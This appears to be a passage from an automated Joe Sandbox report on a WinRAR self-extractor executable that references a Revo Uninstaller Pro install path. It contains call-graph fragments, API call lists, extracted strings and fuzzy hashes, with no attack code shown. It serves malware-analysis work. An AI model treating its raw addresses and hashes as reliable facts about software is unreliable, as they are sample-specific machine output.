24672->24673 24674->24616 24675->24636 24676->24619 24678 2ec667 24677->24678 24679 2ec655 24677->24679 24681 2e607d 80 API calls 24678->24681 24712 2e607d 24679->24712 24682 2ec65f 24681->24682 24682->24620 24684 2f250b 24683->24684 24686 2f24e2 24683->24686 24691 2f24ff 24684->24691 24737 2f4b06 123 API calls 2 library calls 24684->24737 24687 2f2501 24686->24687 24688 2f24f7 24686->24688 24686->24691 24736 2f581e 116 API calls 24687->24736 24723 2f626d 24688->24723 24691->24634 24692->24636 24693->24616 24694->24643 24695->24652 24696->24646 24697->24650 24699 2ea995 GetVersionExW 24698->24699 24700 2e7c41 24699->24700 24700->24661 24706 2ec724 __vswprintf_c_l 24701->24706 24702 2ec86e 24703 2ec896 24702->24703 24704 2ec6ae 6 API calls 24702->24704 24705 2f02e8 SetThreadExecutionState RaiseException 24703->24705 24704->24703 24708 2ec865 24705->24708 24706->24702 24707 2f80d0 101 API calls 24706->24707 24706->24708 24709 2ea810 89 API calls 24706->24709 24707->24706 24708->24664 24709->24706 24710->24664 24711->24672 24713 2e609c 24712->24713 24722 2e6118 24712->24722 24714 2ee7aa 80 API calls 24713->24714 24713->24722 24715 2e60c4 24714->24715 24716 2f11fa WideCharToMultiByte 24715->24716 24717 2e60d7 24716->24717 24718 2e60dc 24717->24718 24719 2e611a 24717->24719 24721 2e644c 80 API calls 24718->24721 24718->24722 24720 2e6165 80 API calls 24719->24720 24720->24722 24721->24722 24722->24682 24724 2f2a7f 75 API calls 24723->24724 24729 2f627e ___BuildCatchObject __vswprintf_c_l 24724->24729 24725 2ec70f 116 API calls 24725->24729 24726 2f6650 24727 2f47da 98 API calls 24726->24727 24728 2f6660 __vswprintf_c_l 24727->24728 24728->24691 24729->24725 24729->24726 24730 2f0697 79 API calls 24729->24730 24731 2f33d3 116 API calls 24729->24731 24732 2f66a2 116 API calls 24729->24732 24733 2f045d 86 API calls 24729->24733 24734 2f6cdb 123 API calls 24729->24734 24735 2f2e2c 98 API calls 24729->24735 24730->24729 24731->24729 24732->24729 24733->24729 24734->24729 24735->24729 24736->24691 24737->24691 24738->24443 24739->24443 24740->24440 24742 2e5c8e 24741->24742 24783 2e5bad 24742->24783 24744 2e5cf9 24744->24456 24745 2e5cc1 24745->24744 24747 2e5d02 24745->24747 24788 2eaa05 CompareStringW CharUpperW CompareStringW 24745->24788 24747->24744 24789 2efa84 CompareStringW 24747->24789 24750 2e80cf 24749->24750 24795 2f1401 CharUpperW 24750->24795 24752 2e8179 24752->24459 24754 2e7bf1 24753->24754 24755 2e7c31 24754->24755 24796 2e6e7d 74 API calls 24754->24796 24755->24472 24757 2e7c29 24797 2e134c 74 API calls 24757->24797 24760 2e9a9e 24759->24760 24761 2e9a8f 24759->24761 24763 2e9b17 SetFileTime 24760->24763 24761->24760 24762 2e9a95 FlushFileBuffers 24761->24762 24762->24760 24763->24524 24764->24447 24765->24451 24766->24448 24767->24472 24768->24472 24769->24464 24770->24480 24771->24471 24772->24480 24773->24490 24774->24492 24775->24495 24776->24516 24777->24516 24778->24516 24779->24516 24780->24518 24781->24519 24782->24470 24790 2e5aaa 24783->24790 24785 2e5bce 24785->24745 24787 2e5aaa 3 API calls 24787->24785 24788->24745 24789->24744 24793 2e5ab4 24790->24793 24791 2e5b9c 24791->24785 24791->24787 24793->24791 24794 2eaa05 CompareStringW CharUpperW CompareStringW 24793->24794 24794->24793 24795->24752 24796->24757 24797->24755 24800 2ea2e9 24799->24800 24801 2ea379 FindNextFileW 24800->24801 24802 2ea307 FindFirstFileW 24800->24802 24803 2ea398 24801->24803 24804 2ea384 GetLastError 24801->24804 24805 2ea320 24802->24805 24810 2ea35d 24802->24810 24803->24810 24804->24803 24806 2eb32c 2 API calls 24805->24806 24807 2ea339 24806->24807 24808 2ea33d FindFirstFileW 24807->24808 24809 2ea352 GetLastError 24807->24809 24808->24809 24808->24810 24809->24810 24810->24393 24811->24265 24812->24271 24813->24271 24814->24274 24815->24280 24817 2e9c0e 76 API calls 24816->24817 24818 2e1eaa 24817->24818 24819 2e1973 98 API calls 24818->24819 24822 2e1eae 24818->24822 24820 2e1ebb 24819->24820 24820->24822 24823 2e134c 74 API calls 24820->24823 24822->24288 24822->24289 24823->24822

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002EFD49: GetModuleHandleW.KERNEL32 ref: 002EFD61
                                                                                                                                                • Part of subcall function 002EFD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002EFD79
                                                                                                                                                • Part of subcall function 002EFD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002EFD9C
                                                                                                                                                • Part of subcall function 002F95F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 002F9600
                                                                                                                                                • Part of subcall function 002F9AA0: OleInitialize.OLE32(00000000), ref: 002F9AB9
                                                                                                                                                • Part of subcall function 002F9AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002F9AF0
                                                                                                                                                • Part of subcall function 002F9AA0: SHGetMalloc.SHELL32(003275C0), ref: 002F9AFA
                                                                                                                                                • Part of subcall function 002F1017: GetCPInfo.KERNEL32(00000000,?), ref: 002F1028
                                                                                                                                                • Part of subcall function 002F1017: IsDBCSLeadByte.KERNEL32(00000000), ref: 002F103C
                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 002FCC00
                                                                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 002FCC27
                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 002FCC38
                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 002FCC72
                                                                                                                                                • Part of subcall function 002FC891: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 002FC8A7
                                                                                                                                                • Part of subcall function 002FC891: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002FC8E3
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 002FCC7B
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,0033CE18,00000800), ref: 002FCC96
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,0033CE18), ref: 002FCCA8
                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 002FCCAF
                                                                                                                                              • _swprintf.LIBCMT ref: 002FCCEE
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 002FCD00
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 002FCD03
                                                                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 002FCD1A
                                                                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 002FCD6B
                                                                                                                                              • Sleep.KERNEL32(?), ref: 002FCD99
                                                                                                                                              • DeleteObject.GDI32 ref: 002FCDD8
                                                                                                                                              • DeleteObject.GDI32(?), ref: 002FCDE4
                                                                                                                                              • CloseHandle.KERNEL32 ref: 002FCE23
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Program Files\VS Revo Group\Revo Uninstaller Pro$STARTDLG$ps2$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                              • API String ID: 788466649-1595129590
                                                                                                                                              • Opcode ID: 25cdbceed84b76709c05b9ff0bea0f253fb7beb519df1bc5931cdba5eaf7eb34
                                                                                                                                              • Instruction ID: 4d6ea04a4349535d0bc716d4ea95b797e8636a251c785de86e1b6c4ad7c9594b
                                                                                                                                              • Opcode Fuzzy Hash: 25cdbceed84b76709c05b9ff0bea0f253fb7beb519df1bc5931cdba5eaf7eb34
                                                                                                                                              • Instruction Fuzzy Hash: 986128715142096BD323AF60EC89FBBBBACFF49780F104439FA05971A1DB748865CBA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 983 2ea2df-2ea305 call 2fd940 986 2ea379-2ea382 FindNextFileW 983->986 987 2ea307-2ea31a FindFirstFileW 983->987 988 2ea398-2ea39a 986->988 989 2ea384-2ea392 GetLastError 986->989 990 2ea3a0-2ea449 call 2efab1 call 2eb9b9 call 2f0a81 * 3 987->990 991 2ea320-2ea33b call 2eb32c 987->991 988->990 992 2ea44e-2ea461 988->992 989->988 990->992 998 2ea33d-2ea350 FindFirstFileW 991->998 999 2ea352-2ea35b GetLastError 991->999 998->990 998->999 1000 2ea36c 999->1000 1001 2ea35d-2ea360 999->1001 1004 2ea36e-2ea374 1000->1004 1001->1000 1003 2ea362-2ea365 1001->1003 1003->1000 1006 2ea367-2ea36a 1003->1006 1004->992 1006->1004
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA314
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA34A
                                                                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA352
                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA37A
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,002EA1DA,000000FF,?,?), ref: 002EA386
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 869497890-0
                                                                                                                                              • Opcode ID: bb3da9719be7a9083f37c048a0f5850609c16041fe11dd4dbe1556fc635e06bc
                                                                                                                                              • Instruction ID: 97321c7e48f5ae07d9087fe20f5bde9ab580a34936489c49e74df9e8587b6897
                                                                                                                                              • Opcode Fuzzy Hash: bb3da9719be7a9083f37c048a0f5850609c16041fe11dd4dbe1556fc635e06bc
                                                                                                                                              • Instruction Fuzzy Hash: 69418571554385AFC325DF69C880ADBF7E8BB88340F404A2AF599D3241D770A964CB92
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00306AC9,?,0031A800,0000000C,00306C20,?,00000002,00000000), ref: 00306B14
                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00306AC9,?,0031A800,0000000C,00306C20,?,00000002,00000000), ref: 00306B1B
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00306B2D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                              • Opcode ID: c57ef7db5e5ce7c772459d88e559fbeaa34acb1532ceab76cefc5d476b5daf2e
                                                                                                                                              • Instruction ID: 18eb08adcc3247277bd5ab0582799b3f79f26fa20b540592eda4f845d5cb4eb5
                                                                                                                                              • Opcode Fuzzy Hash: c57ef7db5e5ce7c772459d88e559fbeaa34acb1532ceab76cefc5d476b5daf2e
                                                                                                                                              • Instruction Fuzzy Hash: 4DE0B675001208ABCF136F65DD1AA9A3F6DEB48781F018424FA0A8A172CB35DD62CB90
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog_memcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3004599000-0
                                                                                                                                              • Opcode ID: f3afc8bed7b9489612c38dece35fcee43ce78d13e43778a7ddbb21306479923e
                                                                                                                                              • Instruction ID: d52df4e5ecd338056ca40e5b68b790f326eb8e0f0983eb9d7f1e46754843a5d7
                                                                                                                                              • Opcode Fuzzy Hash: f3afc8bed7b9489612c38dece35fcee43ce78d13e43778a7ddbb21306479923e
                                                                                                                                              • Instruction Fuzzy Hash: 79820E719641C6AEDF15CF66C885BF977A8BF15300F8840BAEC8D9B142DF315AA4CB60
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002FA5D6
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prologItemTextWindow
                                                                                                                                              • String ID: "%s"%s$,>1$-el -s2 "-d%s" "-sp%s"$<$@$C:\Program Files\VS Revo Group\Revo Uninstaller Pro$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                              • API String ID: 810644672-502532655
                                                                                                                                              • Opcode ID: 0e7799c3c6f9a9c310eb28551c36313df138bea2a9cf3f84a06edab747ba45b8
                                                                                                                                              • Instruction ID: 5089dd0db32284a78b86dad2911515cc47d4245e3d78909d168fd50b48c671b8
                                                                                                                                              • Opcode Fuzzy Hash: 0e7799c3c6f9a9c310eb28551c36313df138bea2a9cf3f84a06edab747ba45b8
                                                                                                                                              • Instruction Fuzzy Hash: 434216B09643496FEB229F609C85FFEBB6CAB06780F104079F709A61D1C7B44965CF62

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 255 2efd49-2efd6b call 2fd940 GetModuleHandleW 258 2efdbe-2f0025 255->258 259 2efd6d-2efd84 GetProcAddress 255->259 262 2f002b-2f0036 call 306662 258->262 263 2f00f3-2f0124 GetModuleFileNameW call 2eb943 call 2efab1 258->263 260 2efd96-2efda0 GetProcAddress 259->260 261 2efd86-2efd93 259->261 260->258 264 2efda2-2efdb9 260->264 261->260 262->263 271 2f003c-2f0069 GetModuleFileNameW CreateFileW 262->271 275 2f0126-2f0130 call 2ea995 263->275 264->258 273 2f006b-2f0079 SetFilePointer 271->273 274 2f00e7-2f00ee CloseHandle 271->274 273->274 276 2f007b-2f0098 ReadFile 273->276 274->263 282 2f013d 275->282 283 2f0132-2f0136 call 2efcfd 275->283 276->274 278 2f009a-2f00bf 276->278 279 2f00dc-2f00e5 call 2ef835 278->279 279->274 290 2f00c1-2f00db call 2efcfd 279->290 285 2f013f-2f0141 282->285 287 2f013b 283->287 288 2f0163-2f0185 call 2eb9b9 GetFileAttributesW 285->288 289 2f0143-2f0161 CompareStringW 285->289 287->285 292 2f0187-2f018b 288->292 297 2f018f 288->297 289->288 289->292 290->279 292->275 296 2f018d 292->296 298 2f0193-2f0198 296->298 297->298 299 2f01cc-2f01ce 298->299 300 2f019a 298->300 301 2f02db-2f02e5 299->301 302 2f01d4-2f01eb call 2eb98d call 2ea995 299->302 303 2f019c-2f01be call 2eb9b9 GetFileAttributesW 300->303 313 2f01ed-2f024e call 2efcfd * 2 call 2eda42 call 2e3e41 call 2eda42 call 2f9735 302->313 314 2f0253-2f0286 call 2e3e41 AllocConsole 302->314 308 2f01c8 303->308 309 2f01c0-2f01c4 303->309 308->299 309->303 311 2f01c6 309->311 311->299 320 2f02d3-2f02d5 ExitProcess 313->320 319 2f0288-2f02cd GetCurrentProcessId AttachConsole call 302b33 GetStdHandle WriteConsoleW Sleep FreeConsole 314->319 314->320 319->320
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32 ref: 002EFD61
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002EFD79
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002EFD9C
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002F0047
                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002F005F
                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002F0071
                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,003128D4,00000000), ref: 002F0090
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 002F00E8
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002F00FE
                                                                                                                                              • CompareStringW.KERNEL32(00000400,00001001, )1,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 002F0158
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,003128EC,00000800,?,00000000,?,00000800), ref: 002F0181
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,003129AC,00000800), ref: 002F01BA
                                                                                                                                                • Part of subcall function 002EFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002EFD18
                                                                                                                                                • Part of subcall function 002EFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,002EE7F6,Crypt32.dll,?,002EE878,?,002EE85C,?,?,?,?), ref: 002EFD3A
                                                                                                                                              • _swprintf.LIBCMT ref: 002F022A
                                                                                                                                              • _swprintf.LIBCMT ref: 002F0276
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                              • AllocConsole.KERNEL32 ref: 002F027E
                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 002F0288
                                                                                                                                              • AttachConsole.KERNEL32(00000000), ref: 002F028F
                                                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 002F02B5
                                                                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 002F02BC
                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 002F02C7
                                                                                                                                              • FreeConsole.KERNEL32 ref: 002F02CD
                                                                                                                                              • ExitProcess.KERNEL32 ref: 002F02D5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                                                                              • String ID: )1$ *1$$+1$(,1$(-1$(.1$4*1$8)1$<+1$@,1$@-1$@.1$DXGIDebug.dll$L*1$P)1$P,1$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$X+1$X-1$`.1$d*1$dwmapi.dll$h)1$kernel32$l,1$p+1$p-1$t*1$t.1$uxtheme.dll$(1$+1$,1
                                                                                                                                              • API String ID: 1201351596-37809703
                                                                                                                                              • Opcode ID: 929e999cd4f07880c6d67b8568db74e2e664f99b2908c0d7b06d823807197661
                                                                                                                                              • Instruction ID: 55d1802a92dcebf34cbf8ded6e56251dd366ae844fe4318e8cbbde4e126a48f0
                                                                                                                                              • Opcode Fuzzy Hash: 929e999cd4f07880c6d67b8568db74e2e664f99b2908c0d7b06d823807197661
                                                                                                                                              • Instruction Fuzzy Hash: 2BD183B50583859AD73ADF50C849BDFBBECEF8D344F50492DF68896141CBB085A8CB62

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 402 2ecfd0-2ed00b call 2fd870 call 2fd940 call 300bb8 409 2ed03e-2ed047 call 2efab1 402->409 410 2ed00d-2ed03c GetModuleFileNameW call 2eb943 call 2efa89 402->410 413 2ed04c-2ed070 call 2e943c call 2e9768 409->413 410->413 421 2ed42d-2ed433 call 2e946e 413->421 422 2ed076-2ed07e 413->422 426 2ed438-2ed449 421->426 424 2ed09c-2ed0cb call 305030 * 2 422->424 425 2ed080-2ed098 call 2f3393 * 2 422->425 435 2ed0ce-2ed0d1 424->435 436 2ed09a 425->436 437 2ed1ff-2ed222 call 2e9a4c call 302b53 435->437 438 2ed0d7-2ed0dd call 2e9b57 435->438 436->424 437->421 447 2ed228-2ed243 call 2e9979 437->447 442 2ed0e2-2ed109 call 2e9979 438->442 448 2ed10f-2ed117 442->448 449 2ed1c8-2ed1cb 442->449 463 2ed24c-2ed25f call 302b53 447->463 464 2ed245-2ed24a 447->464 451 2ed119-2ed121 448->451 452 2ed142-2ed14d 448->452 453 2ed1ce-2ed1f0 call 2e9a4c 449->453 451->452 458 2ed123-2ed13d call 305460 451->458 454 2ed14f-2ed15b 452->454 455 2ed178-2ed180 452->455 453->435 467 2ed1f6-2ed1f9 453->467 454->455 459 2ed15d-2ed162 454->459 461 2ed1ac-2ed1b0 455->461 462 2ed182-2ed18a 455->462 478 2ed1be-2ed1c6 458->478 479 2ed13f 458->479 459->455 466 2ed164-2ed176 call 304da0 459->466 461->449 469 2ed1b2-2ed1b5 461->469 462->461 468 2ed18c-2ed1a6 call 305460 462->468 463->421 483 2ed265-2ed281 call 2f0fde call 302b4e 463->483 470 2ed284-2ed28b 464->470 466->455 485 2ed1ba 466->485 467->421 467->437 468->421 468->461 469->448 474 2ed28f-2ed2b8 call 2efa56 call 302b53 470->474 475 2ed28d 470->475 492 2ed2ba-2ed2c1 call 302b4e 474->492 493 2ed2c6-2ed2d9 474->493 475->474 478->453 479->452 483->470 485->478 492->421 495 2ed2df-2ed2ed 493->495 496 2ed3c1-2ed3e4 call 2ecb33 call 302b4e * 2 493->496 497 2ed2f4-2ed2f9 495->497 533 2ed3fe-2ed42a call 305030 * 2 496->533 534 2ed3e6-2ed3fc call 2f3393 * 2 496->534 500 2ed2ff-2ed308 497->500 501 2ed5f5-2ed5fd 497->501 503 2ed30a-2ed30e 500->503 504 2ed314-2ed31b 500->504 505 2ed3bb-2ed3be 501->505 506 2ed603-2ed607 501->506 503->501 503->504 508 2ed508-2ed519 call 2ef91a 504->508 509 2ed321-2ed346 504->509 505->496 510 2ed609-2ed60f 506->510 511 2ed657-2ed65d 506->511 535 2ed5ef-2ed5f2 508->535 536 2ed51f-2ed548 call 2efab1 call 304e1d 508->536 515 2ed349-2ed36e call 302b33 call 304da0 509->515 516 2ed615-2ed61c 510->516 517 2ed3b2-2ed3b5 510->517 513 2ed65f-2ed665 511->513 514 2ed683-2ed69d call 2ecb33 511->514 513->514 520 2ed667-2ed66d 513->520 538 2ed67b-2ed67e 514->538 552 2ed386 515->552 553 2ed370-2ed37a 515->553 523 2ed61e-2ed621 516->523 524 2ed643 516->524 517->497 517->505 520->517 528 2ed673-2ed67a 520->528 531 2ed63f-2ed641 523->531 532 2ed623-2ed626 523->532 527 2ed645-2ed652 524->527 527->517 528->538 531->527 540 2ed63b-2ed63d 532->540 541 2ed628-2ed62b 532->541 533->421 534->533 535->501 536->535 561 2ed54e-2ed5b5 call 2f11fa call 2efa56 call 2efa2f call 2efa56 call 304e71 536->561 540->527 547 2ed62d-2ed631 541->547 548 2ed637-2ed639 541->548 547->520 554 2ed633-2ed635 547->554 548->527 559 2ed389-2ed38d 552->559 553->552 558 2ed37c-2ed384 553->558 554->527 558->559 559->515 562 2ed38f-2ed396 559->562 595 2ed5b7-2ed5c0 561->595 596 2ed5c3-2ed5d8 561->596 564 2ed44c-2ed44f 562->564 565 2ed39c-2ed3aa call 2efa56 562->565 564->508 568 2ed455-2ed45c 564->568 569 2ed3af 565->569 571 2ed45e-2ed462 568->571 572 2ed464-2ed465 568->572 569->517 571->572 574 2ed467-2ed475 571->574 572->568 576 2ed496-2ed4bb call 2f11fa 574->576 577 2ed477-2ed47a 574->577 584 2ed4de-2ed4e6 576->584 585 2ed4bd-2ed4d9 call 302b69 576->585 580 2ed47c-2ed491 577->580 581 2ed493 577->581 580->577 580->581 581->576 588 2ed4ed-2ed503 call 